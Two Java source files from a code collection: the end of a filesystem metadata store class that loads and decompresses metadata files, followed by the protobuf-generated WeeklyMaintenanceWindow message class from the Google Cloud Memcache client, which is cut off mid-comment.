FileSystem fs) { try { TreeSet<Path> fileList = Sets.newTreeSet(); Arrays.stream(fs.listStatus(filePath)).forEach(status -> getAllFilePath(status.getPath(), fs, fileList)); return fileList; } catch (Exception e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } MemoryMetaData getAllFile(Path filePath) { Date startTime = new Date(); MemoryMetaData data = MemoryMetaData.createEmpty(); // Extract duplicate code, load data to MemoryMetaData through FileStatus BiConsumer<FileStatus, MemoryMetaData> loadMetadataProcess = (innerStat, dataHelper) -> { RawResource innerRaw; try { innerRaw = loadOne(innerStat, filePath); if (innerRaw != null) { dataHelper.put(innerRaw.getMetaType(), new VersionedRawResource(innerRaw)); } } catch (IOException | InstantiationException | IllegalAccessException e) { Throwables.throwIfUnchecked(e); } }; try { FileStatus[] fileStatuses = 
fs.listStatus(filePath); log.info("getAllFile from {} started", filePath); List<Future<?>> futures = new ArrayList<>(); for (FileStatus childStatus : fileStatuses) { getAndPutAllFileRecursion(childStatus, fs, data, futures, loadMetadataProcess); } // wait for fileSystemMetadataExecutor to finish for (Future<?> future : futures) { Uninterruptibles.getUninterruptibly(future); } log.info("getAllFile cost {} ms", new Date().getTime() - startTime.getTime()); return data; } catch (Exception e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } private static void getAllFilePath(Path filePath, FileSystem fs, TreeSet<Path> fileList) { try { FileStatus[] files = fs.listStatus(filePath); for (FileStatus file : files) { if (file.isDirectory()) { getAllFilePath(file.getPath(), fs, fileList); } else { fileList.add(file.getPath()); } } } catch (IOException e) { Throwables.throwIfUnchecked(e); } } public void getAndPutAllFileRecursion(FileStatus status, FileSystem fs, MemoryMetaData data, List<Future<?>> futures, BiConsumer<FileStatus, MemoryMetaData> process) { try { for (FileStatus childStatus : fs.listStatus(status.getPath())) { if (childStatus.isDirectory()) { getAndPutAllFileRecursion(childStatus, fs, data, futures, process); } else { if (fileSystemMetadataExecutor != null) { futures.add(fileSystemMetadataExecutor.submit(() -> process.accept(childStatus, data))); } else { process.accept(childStatus, data); } } } } catch (IOException e) { Throwables.throwIfUnchecked(e); } } private List<String> getAllFilePathFromCompressedFiles() { return getCompressedFiles().keySet().stream().map(FileSystemMetadataStore::pathWithoutJsonSuffix) .collect(Collectors.toList()); } private void createMetaFolderIfNeed(Path metaDirName) { //create hdfs meta path try { if (!fs.exists(metaDirName)) { fs.mkdirs(metaDirName); } } catch (IOException e) { Throwables.throwIfUnchecked(e); } } @Getter(lazy = true) private final Map<String, RawResource> compressedFiles = 
getFilesFromCompressedFile(); private Map<String, RawResource> getFilesFromCompressedFile() { val compressedFile = getRealFileSystemPath(COMPRESSED_FILE); return getFilesFromCompressedFile(compressedFile, compressHandlerInterface, fs); } public static Map<String, RawResource> getFilesFromCompressedFile(Path compressedFile, CompressHandlerInterface handler, FileSystem fs) { try { if (fs == null || !fs.exists(compressedFile) || !fs.isFile(compressedFile)) { return Maps.newHashMap(); } } catch (IOException e) { log.warn("Check file failed. ", e); return Maps.newHashMap(); } try { return getFilesFromCompressedFileByStream(fs.open(compressedFile), handler); } catch (IOException e) { log.warn("Get file from compressed file error", e); return Maps.newHashMap(); } } public static Map<String, RawResource> getFilesFromCompressedFileByStream(InputStream stream, CompressHandlerInterface handler) { val res = Maps.<String, RawResource> newHashMap(); Preconditions.checkNotNull(handler, "compress handler should not be null!"); try (InputStream in = stream; ZipInputStream zipIn = new ZipInputStream(in)) { ZipEntry zipEntry; while ((zipEntry = zipIn.getNextEntry()) != null) { String path = zipEntry.getName(); if (path.startsWith("/")) { path = path.substring(1); } val raw = handler.read(zipIn, path, zipEntry.getTime(), splitFilePath(path).getKey()); if (raw != null) { res.put(path, raw); } } return res; } catch (Exception e) { log.warn("get file from compressed file error", e); } return Maps.newHashMap(); } private boolean compressedFilesContains(String path) { if (File.separator.equals(path)) { return !getCompressedFiles().isEmpty(); } return getCompressedFiles().keySet().stream() .anyMatch(file -> file.startsWith(path + "/") || file.equals(path)); } private static String pathWithoutJsonSuffix(String path) { if (path.endsWith(JSON_SUFFIX)) { path = path.substring(0, path.length() - JSON_SUFFIX.length()); } return path; } public interface CompressHandlerInterface { <T extends 
RawResource> T read(InputStream in, String resPath, long time, MetadataType type) throws IOException; void write(OutputStream out, RawResource raw) throws IOException; } @VisibleForTesting public static class CompressHandler implements CompressHandlerInterface { @Override @SuppressWarnings("unchecked") public <T extends RawResource> T read(InputStream in, String resPath, long time, MetadataType type) throws IOException { val raw = IOUtils.toByteArray(in); String name = resPath.substring(resPath.lastIndexOf("/") + 1); String metaKey = pathWithoutJsonSuffix(name); return (T) RawResource.constructResource(type, ByteSource.wrap(raw), time, 0, metaKey); } @Override public void write(OutputStream out, RawResource raw) throws IOException { try (InputStream inputStream = ByteSource.wrap(raw.getContent()).openStream()) { IOUtils.copy(inputStream, out); } } } public static class SnapShotCompressHandler implements CompressHandlerInterface { @Override @SuppressWarnings("unchecked") public <T extends RawResource> T read(InputStream in, String resPath, long time, MetadataType type) throws IOException { val snap = JsonUtil.readValue(IOUtils.toByteArray(in), SnapshotRawResource.class); String name = resPath.substring(resPath.lastIndexOf("/") + 1); return (T) RawResource.constructResource(type, snap.getByteSource(), snap.getTimestamp(), snap.getMvcc(), pathWithoutJsonSuffix(name)); } @Override public void write(OutputStream out, RawResource raw) throws IOException { val snapshotRawResource = new SnapshotRawResource(raw); out.write(JsonUtil.writeValueAsIndentBytes(snapshotRawResource)); } } }
googleapis/google-cloud-java
35,818
java-memcache/proto-google-cloud-memcache-v1/src/main/java/com/google/cloud/memcache/v1/WeeklyMaintenanceWindow.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/memcache/v1/cloud_memcache.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.memcache.v1; /** * * * <pre> * Time window specified for weekly operations. * </pre> * * Protobuf type {@code google.cloud.memcache.v1.WeeklyMaintenanceWindow} */ public final class WeeklyMaintenanceWindow extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.memcache.v1.WeeklyMaintenanceWindow) WeeklyMaintenanceWindowOrBuilder { private static final long serialVersionUID = 0L; // Use WeeklyMaintenanceWindow.newBuilder() to construct. 
private WeeklyMaintenanceWindow(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private WeeklyMaintenanceWindow() { day_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new WeeklyMaintenanceWindow(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.class, com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.Builder.class); } private int bitField0_; public static final int DAY_FIELD_NUMBER = 1; private int day_ = 0; /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The enum numeric value on the wire for day. */ @java.lang.Override public int getDayValue() { return day_; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The day. */ @java.lang.Override public com.google.type.DayOfWeek getDay() { com.google.type.DayOfWeek result = com.google.type.DayOfWeek.forNumber(day_); return result == null ? com.google.type.DayOfWeek.UNRECOGNIZED : result; } public static final int START_TIME_FIELD_NUMBER = 2; private com.google.type.TimeOfDay startTime_; /** * * * <pre> * Required. Start time of the window in UTC. 
* </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return Whether the startTime field is set. */ @java.lang.Override public boolean hasStartTime() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The startTime. */ @java.lang.Override public com.google.type.TimeOfDay getStartTime() { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.type.TimeOfDayOrBuilder getStartTimeOrBuilder() { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } public static final int DURATION_FIELD_NUMBER = 3; private com.google.protobuf.Duration duration_; /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return Whether the duration field is set. */ @java.lang.Override public boolean hasDuration() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The duration. */ @java.lang.Override public com.google.protobuf.Duration getDuration() { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } /** * * * <pre> * Required. Duration of the time window. 
* </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.protobuf.DurationOrBuilder getDurationOrBuilder() { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (day_ != com.google.type.DayOfWeek.DAY_OF_WEEK_UNSPECIFIED.getNumber()) { output.writeEnum(1, day_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getStartTime()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(3, getDuration()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (day_ != com.google.type.DayOfWeek.DAY_OF_WEEK_UNSPECIFIED.getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(1, day_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getStartTime()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(3, getDuration()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.memcache.v1.WeeklyMaintenanceWindow)) { return super.equals(obj); } com.google.cloud.memcache.v1.WeeklyMaintenanceWindow other = (com.google.cloud.memcache.v1.WeeklyMaintenanceWindow) obj; if (day_ != other.day_) return false; if (hasStartTime() != other.hasStartTime()) 
return false; if (hasStartTime()) { if (!getStartTime().equals(other.getStartTime())) return false; } if (hasDuration() != other.hasDuration()) return false; if (hasDuration()) { if (!getDuration().equals(other.getDuration())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + DAY_FIELD_NUMBER; hash = (53 * hash) + day_; if (hasStartTime()) { hash = (37 * hash) + START_TIME_FIELD_NUMBER; hash = (53 * hash) + getStartTime().hashCode(); } if (hasDuration()) { hash = (37 * hash) + DURATION_FIELD_NUMBER; hash = (53 * hash) + getDuration().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom(byte[] data) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override 
public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.memcache.v1.WeeklyMaintenanceWindow prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Time window specified for weekly operations. * </pre> * * Protobuf type {@code google.cloud.memcache.v1.WeeklyMaintenanceWindow} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.memcache.v1.WeeklyMaintenanceWindow) com.google.cloud.memcache.v1.WeeklyMaintenanceWindowOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.class, com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.Builder.class); } // Construct using com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if 
(com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getStartTimeFieldBuilder(); getDurationFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; day_ = 0; startTime_ = null; if (startTimeBuilder_ != null) { startTimeBuilder_.dispose(); startTimeBuilder_ = null; } duration_ = null; if (durationBuilder_ != null) { durationBuilder_.dispose(); durationBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_descriptor; } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow getDefaultInstanceForType() { return com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.getDefaultInstance(); } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow build() { com.google.cloud.memcache.v1.WeeklyMaintenanceWindow result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow buildPartial() { com.google.cloud.memcache.v1.WeeklyMaintenanceWindow result = new com.google.cloud.memcache.v1.WeeklyMaintenanceWindow(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.memcache.v1.WeeklyMaintenanceWindow result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.day_ = day_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.startTime_ = startTimeBuilder_ == null ? startTime_ : startTimeBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.duration_ = durationBuilder_ == null ? 
duration_ : durationBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.memcache.v1.WeeklyMaintenanceWindow) { return mergeFrom((com.google.cloud.memcache.v1.WeeklyMaintenanceWindow) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.memcache.v1.WeeklyMaintenanceWindow other) { if (other == com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.getDefaultInstance()) return this; if (other.day_ != 0) { setDayValue(other.getDayValue()); } if (other.hasStartTime()) { mergeStartTime(other.getStartTime()); } if (other.hasDuration()) { mergeDuration(other.getDuration()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if 
(extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { day_ = input.readEnum(); bitField0_ |= 0x00000001; break; } // case 8 case 18: { input.readMessage(getStartTimeFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 26: { input.readMessage(getDurationFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000004; break; } // case 26 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private int day_ = 0; /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The enum numeric value on the wire for day. */ @java.lang.Override public int getDayValue() { return day_; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The enum numeric value on the wire for day to set. * @return This builder for chaining. */ public Builder setDayValue(int value) { day_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The day. 
*/ @java.lang.Override public com.google.type.DayOfWeek getDay() { com.google.type.DayOfWeek result = com.google.type.DayOfWeek.forNumber(day_); return result == null ? com.google.type.DayOfWeek.UNRECOGNIZED : result; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The day to set. * @return This builder for chaining. */ public Builder setDay(com.google.type.DayOfWeek value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000001; day_ = value.getNumber(); onChanged(); return this; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearDay() { bitField0_ = (bitField0_ & ~0x00000001); day_ = 0; onChanged(); return this; } private com.google.type.TimeOfDay startTime_; private com.google.protobuf.SingleFieldBuilderV3< com.google.type.TimeOfDay, com.google.type.TimeOfDay.Builder, com.google.type.TimeOfDayOrBuilder> startTimeBuilder_; /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return Whether the startTime field is set. */ public boolean hasStartTime() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The startTime. */ public com.google.type.TimeOfDay getStartTime() { if (startTimeBuilder_ == null) { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } else { return startTimeBuilder_.getMessage(); } } /** * * * <pre> * Required. 
Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setStartTime(com.google.type.TimeOfDay value) { if (startTimeBuilder_ == null) { if (value == null) { throw new NullPointerException(); } startTime_ = value; } else { startTimeBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setStartTime(com.google.type.TimeOfDay.Builder builderForValue) { if (startTimeBuilder_ == null) { startTime_ = builderForValue.build(); } else { startTimeBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeStartTime(com.google.type.TimeOfDay value) { if (startTimeBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && startTime_ != null && startTime_ != com.google.type.TimeOfDay.getDefaultInstance()) { getStartTimeBuilder().mergeFrom(value); } else { startTime_ = value; } } else { startTimeBuilder_.mergeFrom(value); } if (startTime_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearStartTime() { bitField0_ = (bitField0_ & ~0x00000002); startTime_ = null; if (startTimeBuilder_ != null) { startTimeBuilder_.dispose(); startTimeBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. Start time of the window in UTC. 
* </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.type.TimeOfDay.Builder getStartTimeBuilder() { bitField0_ |= 0x00000002; onChanged(); return getStartTimeFieldBuilder().getBuilder(); } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.type.TimeOfDayOrBuilder getStartTimeOrBuilder() { if (startTimeBuilder_ != null) { return startTimeBuilder_.getMessageOrBuilder(); } else { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.type.TimeOfDay, com.google.type.TimeOfDay.Builder, com.google.type.TimeOfDayOrBuilder> getStartTimeFieldBuilder() { if (startTimeBuilder_ == null) { startTimeBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.type.TimeOfDay, com.google.type.TimeOfDay.Builder, com.google.type.TimeOfDayOrBuilder>( getStartTime(), getParentForChildren(), isClean()); startTime_ = null; } return startTimeBuilder_; } private com.google.protobuf.Duration duration_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> durationBuilder_; /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the duration field is set. */ public boolean hasDuration() { return ((bitField0_ & 0x00000004) != 0); } /** * * * <pre> * Required. Duration of the time window. 
* </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The duration. */ public com.google.protobuf.Duration getDuration() { if (durationBuilder_ == null) { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } else { return durationBuilder_.getMessage(); } } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setDuration(com.google.protobuf.Duration value) { if (durationBuilder_ == null) { if (value == null) { throw new NullPointerException(); } duration_ = value; } else { durationBuilder_.setMessage(value); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setDuration(com.google.protobuf.Duration.Builder builderForValue) { if (durationBuilder_ == null) { duration_ = builderForValue.build(); } else { durationBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeDuration(com.google.protobuf.Duration value) { if (durationBuilder_ == null) { if (((bitField0_ & 0x00000004) != 0) && duration_ != null && duration_ != com.google.protobuf.Duration.getDefaultInstance()) { getDurationBuilder().mergeFrom(value); } else { duration_ = value; } } else { durationBuilder_.mergeFrom(value); } if (duration_ != null) { bitField0_ |= 0x00000004; onChanged(); } return this; } /** * * * <pre> * Required. Duration of the time window. 
* </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearDuration() { bitField0_ = (bitField0_ & ~0x00000004); duration_ = null; if (durationBuilder_ != null) { durationBuilder_.dispose(); durationBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.Duration.Builder getDurationBuilder() { bitField0_ |= 0x00000004; onChanged(); return getDurationFieldBuilder().getBuilder(); } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.DurationOrBuilder getDurationOrBuilder() { if (durationBuilder_ != null) { return durationBuilder_.getMessageOrBuilder(); } else { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } } /** * * * <pre> * Required. Duration of the time window. 
